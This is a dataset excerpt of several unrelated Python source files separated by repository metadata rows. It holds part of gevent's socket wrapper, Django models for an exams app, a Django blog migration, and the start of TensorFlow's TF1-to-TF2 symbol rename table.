return '<%s %s>' % (type(self).__name__, self._formatinfo())
def _formatinfo(self):
# pylint:disable=broad-except
try:
fileno = self.fileno()
except Exception as ex:
fileno = str(ex)
try:
sockname = self.getsockname()
sockname = '%s:%s' % sockname
except Exception:
sockname = None
try:
peername = self.getpeername()
peername = '%s:%s' % peername
except Exception:
peername = None
result = 'fileno=%s' % fileno
if sockname is not None:
result += ' sock=' + str(sockname)
if peername is not None:
result += ' peer=' + str(peername)
if getattr(self, 'timeout', None) is not None:
result += ' timeout=' + str(self.timeout)
return result
def accept(self):
while 1:
try:
client_socket, address = self._sock.accept()
break
except error as ex:
if ex.args[0] != EWOULDBLOCK or self.timeout == 0.0:
raise
sys.exc_clear()
self._wait(self._read_event)
sockobj = socket(_sock=client_socket)
if PYPY:
client_socket._drop()
return sockobj, address
def _drop_ref_on_close(self, sock):
# See the same method in _socket3.py. We just can't be as deterministic
# as we can on Python 3.
scheduled_new = self.hub.loop.closing_fd(sock.fileno())
if PYPY:
meth = sock._drop
else:
meth = sock.fileno # Still keep it alive if we need to
if scheduled_new:
self.hub.loop.run_callback(meth)
else:
meth()
def close(self, _closedsocket=_closedsocket):
if not self._sock:
return
# This function should not reference any globals. See Python issue #808164.
# First, break any reference to the loop.io objects. Our
# fileno, which they were tied to, is about to be free to be
# reused, so these objects are no longer functional.
self._drop_events_and_close()
# Next, change self._sock. On CPython, this drops a
# reference, and if it was the last reference, __del__ will
# close it. (We cannot close it, makefile() relies on
# reference counting like this, and it may be shared among
# multiple wrapper objects). Methods *must not* cache
# `self._sock` separately from
# self._write_event/self._read_event, or they will be out of
# sync and we may get inappropriate errors. (See
# test__hub:TestCloseSocketWhilePolling for an example).
self._sock = _closedsocket()
@property
def closed(self):
return isinstance(self._sock, _closedsocket)
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource.
Note, that the new socket does not inherit the timeout."""
return socket(_sock=self._sock)
def makefile(self, mode='r', bufsize=-1):
# Two things to look out for:
# 1) Closing the original socket object should not close the
# fileobject (hence creating a new socket instance);
# An alternate approach is what _socket3.py does, which is to
# keep count of the times makefile objects have been opened (Py3's
# SocketIO helps with that). But the newly created socket, which
# has its own read/write watchers, does need those to be closed
# when the fileobject is; our custom subclass does that. Note that
# we can't pass the 'close=True' argument, as that causes reference counts
# to get screwed up, and Python2 sockets rely on those.
# 2) The resulting fileobject must keep the timeout in order
# to be compatible with the stdlib's socket.makefile.
# Pass self as _sock to preserve timeout.
fobj = _fileobject(type(self)(_sock=self), mode, bufsize)
if PYPY:
self._sock._drop()
return fobj
def sendall(self, data, flags=0):
if isinstance(data, unicode):
data = data.encode()
return _Base.sendall(self, data, flags)
if PYPY:
def _reuse(self):
self._sock._reuse()
def _drop(self):
self._sock._drop()
SocketType = socket
if hasattr(_socket, 'socketpair'):
# The native, low-level socketpair returns
# low-level objects
def socketpair(family=getattr(_socket, 'AF_UNIX', _socket.AF_INET),
type=_socket.SOCK_STREAM, proto=0):
one, two = _socket.socketpair(family, type, proto)
result = socket(_sock=one), socket(_sock=two)
if PYPY:
one._drop()
two._drop()
return result
elif hasattr(__socket__, 'socketpair'):
# The high-level backport uses high-level socket APIs. It works
# cooperatively automatically if we're monkey-patched,
# else we must do it ourself.
_orig_socketpair = __socket__.socketpair
def socketpair(family=_socket.AF_INET, type=_socket.SOCK_STREAM, proto=0):
one, two = _orig_socketpair(family, type, proto)
if not isinstance(one, socket):
one = socket(_sock=one)
two = socket(_sock=two)
if PYPY:
one._drop()
two._drop()
return one, two
elif 'socketpair' in __implements__:
__implements__.remove('socketpair')
if hasattr(_socket, 'fromfd'):
def fromfd(fd, family, type, proto=0):
s = _socket.fromfd(fd, family, type, proto)
result = socket(_sock=s)
if PYPY:
s._drop()
return result
elif 'fromfd' in __implements__:
__implements__.remove('fromfd')
if hasattr(__socket__, 'ssl'):
def ssl(sock, keyfile=None, certfile=None):
# deprecated in 2.7.9 but still present;
# sometimes backported by distros. See ssl.py
# Note that we import gevent.ssl, not _ssl2, to get the correct
# version.
from gevent import ssl as _sslmod
# wrap_socket is 2.7.9/backport, sslwrap_simple is older. They take
# the same arguments.
wrap = getattr(_sslmod, 'wrap_socket', None) or getattr(_sslmod, 'sslwrap_simple')
return wrap(sock, keyfile, certfile)
__implements__.append('ssl')
if hasattr(__socket__, 'sethostname'):
# This was added in 3.3, but PyPy 2.7-7.3.2
# leaked it back into Python 2.
sethostname = __socket__.sethostname
__imports__.append('sethostname')
__all__ = __implements__ + __extensions__ + __imports__
| [
"[email protected]"
] | |
c90939194ffd9a0ae033eda433c4412b90e34be4 | 2bcc6c45a28251dcde72bb8b003b5592350dc208 | /exams/models.py | 5909bafe70117024d9487d86d13b9a60bbab0dba | [] | no_license | amanjhurani/university_dost | 153d1a245df4338be60df3e9980e0238408e40ad | 41f6119c88d36f0153fbf1a5be1913e2c45d9751 | refs/heads/master | 2021-10-08T22:23:42.252577 | 2018-12-18T11:22:10 | 2018-12-18T11:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,291 | py | from django.urls import reverse
from config.settings.base import AUTH_USER_MODEL
from django.db import models
from universities.models import Subject
from config.utils import random_string_generator
from markdownx.models import MarkdownxField
class Exam(models.Model):
# Choices
MONTH_CHOICES = (
('january', 'January'),
('february', 'February'),
('march', 'March'),
('april', 'April'),
('may', 'May'),
('june', 'June'),
('july', 'July'),
('august', 'August'),
('september', 'September'),
('october', 'October'),
('november', 'November'),
('december', 'December')
)
TERM_CHOICES = (
('summer', 'Summer'),
('winter', 'Winter')
)
# Fields
month = models.CharField(max_length=128, choices=MONTH_CHOICES)
year = models.CharField(max_length=4)
term = models.CharField(max_length=12, choices=TERM_CHOICES)
date = models.DateField()
total_time = models.CharField(max_length=12)
total_marks = models.IntegerField()
exam_code = models.CharField(max_length=128, blank=True, null=True)
exam_complete = models.BooleanField(default=False)
# Relationship Fields
subject = models.ForeignKey(
Subject, on_delete=models.CASCADE
)
class Meta:
ordering = ('-pk',)
def save(self, *args, **kwargs):
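        # exam_code is built as "<subject_code>-<5 random characters>"; if that code is
        # already taken, a fresh random suffix is drawn once below.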
if self.exam_code and len(self.exam_code.split('-')) > 3:
self.exam_code = self.exam_code.split('-')[3]
self.exam_code = '{}-{}'.format(
self.subject.subject_code,
random_string_generator(size=5)
)
qs_exists = Exam.objects.filter(exam_code=self.exam_code).exists()
if qs_exists:
self.exam_code = '{}-{}'.format(self.subject.subject_code,
random_string_generator(size=5))
super(Exam, self).save(*args, **kwargs)
def __str__(self):
return self.subject.name + " " + self.term + "-" + self.year
def get_absolute_url(self):
return reverse('exams_exam_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_exam_update', args=(self.pk,))
class Question(models.Model):
# Choices
QUESTION_TYPE_CHOICES = (
('mcq', 'MCQ'),
('short_question', 'Short Question'),
('descriptive_question', 'Descriptive Question'),
)
# Fields
question_code = models.CharField(max_length=128, blank=True, null=True)
question_number = models.CharField(max_length=128)
question_body = MarkdownxField()
question_type = models.CharField(
max_length=12, choices=QUESTION_TYPE_CHOICES)
answer = MarkdownxField(blank=True, null=True)
explanation = MarkdownxField(blank=True, null=True)
marks = models.IntegerField()
upvote = models.IntegerField(default=0)
downvote = models.IntegerField(default=0)
# Relationship Fields
exam = models.ForeignKey(
Exam, on_delete=models.CASCADE
)
author = models.ForeignKey(
AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL
)
class Meta:
ordering = ('-pk',)
def save(self, *args, **kwargs):
if len(self.question_code.split('-')) > 4:
self.question_code = self.question_code.split('-')[4]
self.question_code = '{}-{}'.format(
self.exam.exam_code,
self.question_code
)
super(Question, self).save(*args, **kwargs)
def __str__(self):
return (self.question_number +
" | " + self.exam.term +
"-" + self.exam.year
)
def get_absolute_url(self):
return reverse('exams_question_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_question_update', args=(self.pk,))
class AnswerFeedback(models.Model):
# Choices
FEEDBACK_TYPE_CHOICES = (
('wrong_answer', 'Wrong Answer'),
('improvement', 'Improvement'),
)
FEEDBACK_STATUS_CHOICES = (
('received', 'Received'),
('reviewing', 'Reviewing'),
('reviewed', 'Reviewed'),
('resolved', 'Resolved')
)
# Fields
feedback_title = models.CharField(max_length=256, blank=True, null=True)
feedback_body = models.TextField()
feedback_type = models.CharField(
max_length=128, choices=FEEDBACK_TYPE_CHOICES)
feedback_status = models.CharField(
max_length=128,
choices=FEEDBACK_STATUS_CHOICES,
default='received')
user_email = models.EmailField(max_length=256, blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
# Relationship Fields
question = models.ForeignKey(
Question, on_delete=models.CASCADE
)
user = models.ForeignKey(
AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL
)
class Meta:
ordering = ('-pk',)
def __str__(self):
return self.feedback_title
def get_absolute_url(self):
return reverse('exams_answerfeedback_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_answerfeedback_update', args=(self.pk,))
| [
"[email protected]"
] | |
49f552812ae2ebc0e2cb7111c0f72e6044fd22b7 | d96f75610758fd6e193d575a2c5ba72c420d90e8 | /blog/migrations/0001_initial.py | ae82676f9c48d490aaed6c97ff64cd7594a38393 | [] | no_license | barlapelican/my-first-blog | 4a20ef5f3723209225510436513321b10b5d9fcf | 1594006935765d288434d4542502deb3e954f974 | refs/heads/master | 2020-06-17T06:06:07.116828 | 2019-07-08T13:53:25 | 2019-07-08T13:53:25 | 195,823,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | # Generated by Django 2.0.13 on 2019-07-08 13:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
30e036da1644eb5fa3fbcdbdf92476a5bda2a487 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/tools/compatibility/all_renames_v2.py | 297539c1e7d028c31244a3e2161e48ceaf3be0a9 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 25,028 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides a list of renames between TensorFlow 1.* and 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.tools.compatibility import renames_v2
# pylint: disable=line-too-long
# Add additional renames not in renames_v2.py here.
# IMPORTANT: For the renames in here, if you also need to add to
# function_reorders or function_keyword_renames in tf_upgrade_v2.py,
# use the OLD function name.
# These renames happen after the arguments have been processed.
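# For example, the entry "tf.count_nonzero": "tf.math.count_nonzero" below makes the
# upgrade script rewrite a call such as tf.count_nonzero(x) into tf.math.count_nonzero(x).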
manual_symbol_renames = {
"tf.batch_to_space_nd":
"tf.batch_to_space",
"tf.batch_gather":
"tf.compat.v1.batch_gather",
"tf.space_to_batch_nd":
"tf.space_to_batch",
"tf.nn.space_to_batch":
"tf.space_to_batch",
"tf.estimator.inputs":
"tf.compat.v1.estimator.inputs",
"tf.extract_image_patches":
"tf.image.extract_patches",
"tf.image.extract_image_patches":
"tf.image.extract_patches",
"tf.gfile.Copy":
"tf.io.gfile.copy",
"tf.gfile.DeleteRecursively":
"tf.io.gfile.rmtree",
"tf.gfile.Exists":
"tf.io.gfile.exists",
"tf.gfile.Glob":
"tf.io.gfile.glob",
"tf.gfile.GFile":
"tf.io.gfile.GFile",
"tf.gfile.IsDirectory":
"tf.io.gfile.isdir",
"tf.gfile.ListDirectory":
"tf.io.gfile.listdir",
"tf.gfile.MakeDirs":
"tf.io.gfile.makedirs",
"tf.gfile.MkDir":
"tf.io.gfile.mkdir",
"tf.gfile.Open":
"tf.io.gfile.GFile",
"tf.gfile.Remove":
"tf.io.gfile.remove",
"tf.gfile.Rename":
"tf.io.gfile.rename",
"tf.gfile.Stat":
"tf.io.gfile.stat",
"tf.gfile.Walk":
"tf.io.gfile.walk",
"tf.contrib.cluster_resolver.ClusterResolver":
"tf.distribute.cluster_resolver.ClusterResolver",
"tf.contrib.cluster_resolver.GceClusterResolver":
"tf.distribute.cluster_resolver.GCEClusterResolver",
"tf.contrib.cluster_resolver.KubernetesClusterResolver":
"tf.distribute.cluster_resolver.KubernetesClusterResolver",
"tf.contrib.cluster_resolver.SimpleClusterResolver":
"tf.distribute.cluster_resolver.SimpleClusterResolver",
"tf.contrib.cluster_resolver.SlurmClusterResolver":
"tf.distribute.cluster_resolver.SlurmClusterResolver",
"tf.contrib.cluster_resolver.TFConfigClusterResolver":
"tf.distribute.cluster_resolver.TFConfigClusterResolver",
"tf.contrib.cluster_resolver.TPUClusterResolver":
"tf.distribute.cluster_resolver.TPUClusterResolver",
"tf.contrib.cluster_resolver.UnionClusterResolver":
"tf.distribute.cluster_resolver.UnionClusterResolver",
"tf.contrib.data.AUTOTUNE":
"tf.data.experimental.AUTOTUNE",
"tf.contrib.data.Counter":
"tf.data.experimental.Counter",
"tf.contrib.data.CheckpointInputPipelineHook":
"tf.data.experimental.CheckpointInputPipelineHook",
"tf.contrib.data.CsvDataset":
"tf.data.experimental.CsvDataset",
"tf.contrib.data.Optional":
"tf.data.experimental.Optional",
"tf.contrib.data.RandomDataset":
"tf.data.experimental.RandomDataset",
"tf.contrib.data.Reducer":
"tf.data.experimental.Reducer",
"tf.contrib.data.SqlDataset":
"tf.data.experimental.SqlDataset",
"tf.contrib.data.StatsAggregator":
"tf.data.experimental.StatsAggregator",
"tf.contrib.data.TFRecordWriter":
"tf.data.experimental.TFRecordWriter",
"tf.contrib.data.assert_element_shape":
"tf.data.experimental.assert_element_shape",
"tf.contrib.data.bucket_by_sequence_length":
"tf.data.experimental.bucket_by_sequence_length",
"tf.contrib.data.choose_from_datasets":
"tf.data.experimental.choose_from_datasets",
"tf.contrib.data.copy_to_device":
"tf.data.experimental.copy_to_device",
"tf.contrib.data.dense_to_sparse_batch":
"tf.data.experimental.dense_to_sparse_batch",
"tf.contrib.data.enumerate_dataset":
"tf.data.experimental.enumerate_dataset",
"tf.contrib.data.get_next_as_optional":
"tf.data.experimental.get_next_as_optional",
"tf.contrib.data.get_single_element":
"tf.data.experimental.get_single_element",
"tf.contrib.data.group_by_reducer":
"tf.data.experimental.group_by_reducer",
"tf.contrib.data.group_by_window":
"tf.data.experimental.group_by_window",
"tf.contrib.data.ignore_errors":
"tf.data.experimental.ignore_errors",
"tf.contrib.data.latency_stats":
"tf.data.experimental.latency_stats",
"tf.contrib.data.make_batched_features_dataset":
"tf.data.experimental.make_batched_features_dataset",
"tf.contrib.data.make_csv_dataset":
"tf.data.experimental.make_csv_dataset",
"tf.contrib.data.make_saveable_from_iterator":
"tf.data.experimental.make_saveable_from_iterator",
"tf.contrib.data.map_and_batch":
"tf.data.experimental.map_and_batch",
"tf.contrib.data.parallel_interleave":
"tf.data.experimental.parallel_interleave",
"tf.contrib.data.parse_example_dataset":
"tf.data.experimental.parse_example_dataset",
"tf.contrib.data.prefetch_to_device":
"tf.data.experimental.prefetch_to_device",
"tf.contrib.data.rejection_resample":
"tf.data.experimental.rejection_resample",
"tf.contrib.data.sample_from_datasets":
"tf.data.experimental.sample_from_datasets",
"tf.contrib.data.scan":
"tf.data.experimental.scan",
"tf.contrib.data.set_stats_aggregator":
"tf.data.experimental.set_stats_aggregator",
"tf.contrib.data.shuffle_and_repeat":
"tf.data.experimental.shuffle_and_repeat",
"tf.contrib.data.unbatch":
"tf.data.experimental.unbatch",
"tf.contrib.data.unique":
"tf.data.experimental.unique",
"tf.contrib.distribute.CrossDeviceOps":
"tf.distribute.CrossDeviceOps",
"tf.contrib.distribute.ReductionToOneDeviceCrossDeviceOps":
"tf.distribute.ReductionToOneDevice",
"tf.contrib.estimator.make_early_stopping_hook":
"tf.estimator.experimental.make_early_stopping_hook",
"tf.contrib.estimator.stop_if_higher_hook":
"tf.estimator.experimental.stop_if_higher_hook",
"tf.contrib.estimator.stop_if_lower_hook":
"tf.estimator.experimental.stop_if_lower_hook",
"tf.contrib.estimator.stop_if_no_decrease_hook":
"tf.estimator.experimental.stop_if_no_decrease_hook",
"tf.contrib.estimator.stop_if_no_increase_hook":
"tf.estimator.experimental.stop_if_no_increase_hook",
"tf.contrib.framework.CriticalSection":
"tf.CriticalSection",
"tf.contrib.framework.is_tensor":
"tf.is_tensor",
"tf.contrib.framework.load_variable":
"tf.train.load_variable",
"tf.contrib.framework.nest.assert_same_structure":
"tf.nest.assert_same_structure",
"tf.contrib.framework.nest.flatten":
"tf.nest.flatten",
"tf.contrib.framework.nest.is_sequence":
"tf.nest.is_nested",
"tf.contrib.framework.nest.map_structure":
"tf.nest.map_structure",
"tf.contrib.framework.nest.pack_sequence_as":
"tf.nest.pack_sequence_as",
"tf.contrib.batching.batch_function":
"tf.nondifferentiable_batch_function",
"tf.contrib.util.constant_value":
"tf.get_static_value",
"tf.contrib.saved_model.load_keras_model":
"tf.keras.experimental.load_from_saved_model",
"tf.contrib.saved_model.save_keras_model":
"tf.keras.experimental.export_saved_model",
"tf.contrib.rnn.RNNCell":
"tf.compat.v1.nn.rnn_cell.RNNCell",
"tf.contrib.rnn.LSTMStateTuple":
"tf.nn.rnn_cell.LSTMStateTuple",
"tf.contrib.rnn.BasicLSTMCell":
"tf.compat.v1.nn.rnn_cell.BasicLSTMCell",
"tf.contrib.rnn.BasicRNNCell":
"tf.compat.v1.nn.rnn_cell.BasicRNNCell",
"tf.contrib.rnn.GRUCell":
"tf.compat.v1.nn.rnn_cell.GRUCell",
"tf.contrib.rnn.LSTMCell":
"tf.compat.v1.nn.rnn_cell.LSTMCell",
"tf.contrib.rnn.MultiRNNCell":
"tf.compat.v1.nn.rnn_cell.MultiRNNCell",
"tf.contrib.rnn.static_rnn":
"tf.compat.v1.nn.static_rnn",
"tf.contrib.rnn.static_state_saving_rnn":
"tf.compat.v1.nn.static_state_saving_rnn",
"tf.contrib.rnn.static_bidirectional_rnn":
"tf.compat.v1.nn.static_bidirectional_rnn",
"tf.contrib.framework.sort":
"tf.sort",
"tf.contrib.framework.argsort":
"tf.argsort",
"tf.contrib.summary.all_summary_ops":
"tf.compat.v1.summary.all_v2_summary_ops",
"tf.contrib.summary.always_record_summaries":
"tf.compat.v2.summary.record_if",
"tf.contrib.summary.audio":
"tf.compat.v2.summary.audio",
"tf.contrib.summary.create_file_writer":
"tf.compat.v2.summary.create_file_writer",
"tf.contrib.summary.flush":
"tf.compat.v2.summary.flush",
"tf.contrib.summary.generic":
"tf.compat.v2.summary.write",
"tf.contrib.summary.histogram":
"tf.compat.v2.summary.histogram",
"tf.contrib.summary.image":
"tf.compat.v2.summary.image",
"tf.contrib.summary.initialize":
"tf.compat.v1.summary.initialize",
"tf.contrib.summary.never_record_summaries":
"tf.compat.v2.summary.record_if",
"tf.contrib.summary.scalar":
"tf.compat.v2.summary.scalar",
"tf.contrib.tpu.CrossShardOptimizer":
"tf.compat.v1.tpu.CrossShardOptimizer",
"tf.contrib.tpu.InputPipelineConfig":
"tf.compat.v1.estimator.tpu.InputPipelineConfig",
"tf.contrib.tpu.RunConfig":
"tf.compat.v1.estimator.tpu.RunConfig",
"tf.contrib.tpu.TPUConfig":
"tf.compat.v1.estimator.tpu.TPUConfig",
"tf.contrib.tpu.TPUEstimator":
"tf.compat.v1.estimator.tpu.TPUEstimator",
"tf.contrib.tpu.TPUEstimatorSpec":
"tf.compat.v1.estimator.tpu.TPUEstimatorSpec",
"tf.contrib.tpu.batch_parallel":
"tf.compat.v1.tpu.batch_parallel",
"tf.contrib.tpu.bfloat16_scope":
"tf.compat.v1.tpu.bfloat16_scope",
"tf.contrib.tpu.core":
"tf.compat.v1.tpu.core",
"tf.contrib.tpu.cross_replica_sum":
"tf.compat.v1.tpu.cross_replica_sum",
"tf.contrib.tpu.initialize_system":
"tf.compat.v1.tpu.initialize_system",
"tf.contrib.tpu.outside_compilation":
"tf.compat.v1.tpu.outside_compilation",
"tf.contrib.tpu.replicate":
"tf.compat.v1.tpu.replicate",
"tf.contrib.tpu.rewrite":
"tf.compat.v1.tpu.rewrite",
"tf.contrib.tpu.shard":
"tf.compat.v1.tpu.shard",
"tf.contrib.tpu.shutdown_system":
"tf.compat.v1.tpu.shutdown_system",
"tf.contrib.training.checkpoints_iterator":
"tf.train.checkpoints_iterator",
"tf.contrib.layers.recompute_grad":
"tf.recompute_grad",
"tf.count_nonzero":
"tf.math.count_nonzero",
"tf.manip.batch_to_space_nd":
"tf.batch_to_space",
"tf.quantize_v2":
"tf.quantization.quantize",
"tf.sparse_add":
"tf.sparse.add",
"tf.sparse_concat":
"tf.sparse.concat",
"tf.sparse_split":
"tf.sparse.split",
"tf.sparse_matmul":
"tf.linalg.matmul",
"tf.sparse_reduce_sum":
"tf.sparse.reduce_sum",
"tf.sparse_reduce_max":
"tf.sparse.reduce_max",
"tf.random.stateless_multinomial":
"tf.random.stateless_categorical",
"tf.substr":
"tf.strings.substr",
# TODO(b/129398290)
"tf.string_split":
"tf.compat.v1.string_split",
"tf.string_to_hash_bucket":
"tf.strings.to_hash_bucket",
"tf.string_to_number":
"tf.strings.to_number",
"tf.multinomial":
"tf.random.categorical",
"tf.random.multinomial":
"tf.random.categorical",
"tf.reduce_join":
"tf.strings.reduce_join",
"tf.load_file_system_library":
"tf.load_library",
"tf.bincount":
"tf.math.bincount",
"tf.confusion_matrix":
"tf.math.confusion_matrix",
"tf.train.confusion_matrix":
"tf.math.confusion_matrix",
"tf.train.sdca_fprint":
"tf.raw_ops.SdcaFprint",
"tf.train.sdca_optimizer":
"tf.raw_ops.SdcaOptimizer",
"tf.train.sdca_shrink_l1":
"tf.raw_ops.SdcaShrinkL1",
"tf.decode_csv":
"tf.io.decode_csv",
"tf.data.Iterator":
"tf.compat.v1.data.Iterator",
"tf.data.experimental.DatasetStructure":
"tf.data.DatasetSpec",
"tf.data.experimental.OptionalStructure":
"tf.OptionalSpec",
"tf.data.experimental.RaggedTensorStructure":
"tf.RaggedTensorSpec",
"tf.data.experimental.SparseTensorStructure":
"tf.SparseTensorSpec",
"tf.data.experimental.Structure":
"tf.TypeSpec",
"tf.data.experimental.TensorArrayStructure":
"tf.TensorArraySpec",
"tf.data.experimental.TensorStructure":
"tf.TensorSpec",
"tf.parse_example":
"tf.io.parse_example",
"tf.parse_single_example":
"tf.io.parse_single_example",
"tf.nn.fused_batch_norm":
"tf.compat.v1.nn.fused_batch_norm",
"tf.nn.softmax_cross_entropy_with_logits_v2":
"tf.nn.softmax_cross_entropy_with_logits",
"tf.losses.Reduction.MEAN":
"tf.compat.v1.losses.Reduction.MEAN",
"tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS":
"tf.compat.v1.losses.Reduction.SUM_BY_NONZERO_WEIGHTS",
"tf.losses.Reduction.SUM_OVER_NONZERO_WEIGHTS":
"tf.compat.v1.losses.Reduction.SUM_OVER_NONZERO_WEIGHTS",
"tf.lite.constants.FLOAT":
"tf.float32",
"tf.lite.constants.INT32":
"tf.int32",
"tf.lite.constants.INT64":
"tf.int64",
"tf.lite.constants.STRING":
"tf.string",
"tf.lite.constants.QUANTIZED_UINT8":
"tf.uint8",
"tf.arg_max":
"tf.argmax",
"tf.arg_min":
"tf.argmin",
# tf.nn.ctc_loss is still available in 2.0 but behavior
# changed significantly.
"tf.nn.ctc_loss":
"tf.compat.v1.nn.ctc_loss",
# tf.saved_model.load in 1.x has no equivalent in 2.x, but there is a
# symbol with the same name.
"tf.saved_model.load":
"tf.compat.v1.saved_model.load",
"tf.saved_model.load_v2":
"tf.compat.v2.saved_model.load",
"tf.image.resize_images":
"tf.image.resize",
"tf.random_poisson":
"tf.random.poisson",
"tf.debugging.assert_greater":
"tf.compat.v1.debugging.assert_greater",
"tf.debugging.assert_greater_equal":
"tf.compat.v1.debugging.assert_greater_equal",
"tf.debugging.assert_integer":
"tf.compat.v1.debugging.assert_integer",
"tf.debugging.assert_less":
"tf.compat.v1.debugging.assert_less",
"tf.debugging.assert_less_equal":
"tf.compat.v1.debugging.assert_less_equal",
"tf.debugging.assert_near":
"tf.compat.v1.debugging.assert_near",
"tf.debugging.assert_negative":
"tf.compat.v1.debugging.assert_negative",
"tf.debugging.assert_non_negative":
"tf.compat.v1.debugging.assert_non_negative",
"tf.debugging.assert_non_positive":
"tf.compat.v1.debugging.assert_non_positive",
"tf.debugging.assert_none_equal":
"tf.compat.v1.debugging.assert_none_equal",
"tf.debugging.assert_type":
"tf.compat.v1.debugging.assert_type",
"tf.debugging.assert_positive":
"tf.compat.v1.debugging.assert_positive",
"tf.debugging.assert_equal":
"tf.compat.v1.debugging.assert_equal",
"tf.debugging.assert_scalar":
"tf.compat.v1.debugging.assert_scalar",
"tf.assert_equal":
"tf.compat.v1.assert_equal",
"tf.assert_less":
"tf.compat.v1.assert_less",
"tf.assert_greater":
"tf.compat.v1.assert_greater",
"tf.debugging.assert_rank":
"tf.compat.v1.debugging.assert_rank",
"tf.debugging.assert_rank_at_least":
"tf.compat.v1.debugging.assert_rank_at_least",
"tf.debugging.assert_rank_in":
"tf.compat.v1.debugging.assert_rank_in",
"tf.errors.exception_type_from_error_code":
"tf.compat.v1.errors.exception_type_from_error_code",
"tf.errors.error_code_from_exception_type":
"tf.compat.v1.errors.error_code_from_exception_type",
"tf.errors.raise_exception_on_not_ok_status":
"tf.compat.v1.errors.raise_exception_on_not_ok_status",
"tf.assert_rank":
"tf.compat.v1.assert_rank",
"tf.nn.max_pool":
"tf.nn.max_pool2d",
"tf.nn.avg_pool":
"tf.nn.avg_pool2d",
"tf.keras.initializers.zeros":
"tf.compat.v1.keras.initializers.zeros",
"tf.keras.initializers.Zeros":
"tf.compat.v1.keras.initializers.Zeros",
"tf.keras.initializers.ones":
"tf.compat.v1.keras.initializers.ones",
"tf.keras.initializers.Ones":
"tf.compat.v1.keras.initializers.Ones",
"tf.keras.initializers.constant":
"tf.compat.v1.keras.initializers.constant",
"tf.keras.initializers.Constant":
"tf.compat.v1.keras.initializers.Constant",
"tf.keras.initializers.VarianceScaling":
"tf.compat.v1.keras.initializers.VarianceScaling",
"tf.keras.initializers.Orthogonal":
"tf.compat.v1.keras.initializers.Orthogonal",
"tf.keras.initializers.orthogonal":
"tf.compat.v1.keras.initializers.orthogonal",
"tf.keras.initializers.Identity":
"tf.compat.v1.keras.initializers.Identity",
"tf.keras.initializers.identity":
"tf.compat.v1.keras.initializers.identity",
"tf.keras.initializers.glorot_uniform":
"tf.compat.v1.keras.initializers.glorot_uniform",
"tf.keras.initializers.glorot_normal":
"tf.compat.v1.keras.initializers.glorot_normal",
"tf.keras.initializers.lecun_normal":
"tf.compat.v1.keras.initializers.lecun_normal",
"tf.keras.initializers.lecun_uniform":
"tf.compat.v1.keras.initializers.lecun_uniform",
"tf.keras.initializers.he_normal":
"tf.compat.v1.keras.initializers.he_normal",
"tf.keras.initializers.he_uniform":
"tf.compat.v1.keras.initializers.he_uniform",
"tf.keras.initializers.TruncatedNormal":
"tf.compat.v1.keras.initializers.TruncatedNormal",
"tf.keras.initializers.truncated_normal":
"tf.compat.v1.keras.initializers.truncated_normal",
"tf.keras.initializers.RandomUniform":
"tf.compat.v1.keras.initializers.RandomUniform",
"tf.keras.initializers.uniform":
"tf.compat.v1.keras.initializers.uniform",
"tf.keras.initializers.random_uniform":
"tf.compat.v1.keras.initializers.random_uniform",
"tf.keras.initializers.RandomNormal":
"tf.compat.v1.keras.initializers.RandomNormal",
"tf.keras.initializers.normal":
"tf.compat.v1.keras.initializers.normal",
"tf.keras.initializers.random_normal":
"tf.compat.v1.keras.initializers.random_normal",
"tf.zeros_initializer":
"tf.compat.v1.zeros_initializer",
"tf.initializers.zeros":
"tf.compat.v1.initializers.zeros",
"tf.ones_initializer":
"tf.compat.v1.ones_initializer",
"tf.initializers.ones":
"tf.compat.v1.initializers.ones",
"tf.constant_initializer":
"tf.compat.v1.constant_initializer",
"tf.initializers.constant":
"tf.compat.v1.initializers.constant",
"tf.random_uniform_initializer":
"tf.compat.v1.random_uniform_initializer",
"tf.initializers.random_uniform":
"tf.compat.v1.initializers.random_uniform",
"tf.random_normal_initializer":
"tf.compat.v1.random_normal_initializer",
"tf.initializers.random_normal":
"tf.compat.v1.initializers.random_normal",
"tf.truncated_normal_initializer":
"tf.compat.v1.truncated_normal_initializer",
"tf.initializers.truncated_normal":
"tf.compat.v1.initializers.truncated_normal",
"tf.variance_scaling_initializer":
"tf.compat.v1.variance_scaling_initializer",
"tf.initializers.variance_scaling":
"tf.compat.v1.initializers.variance_scaling",
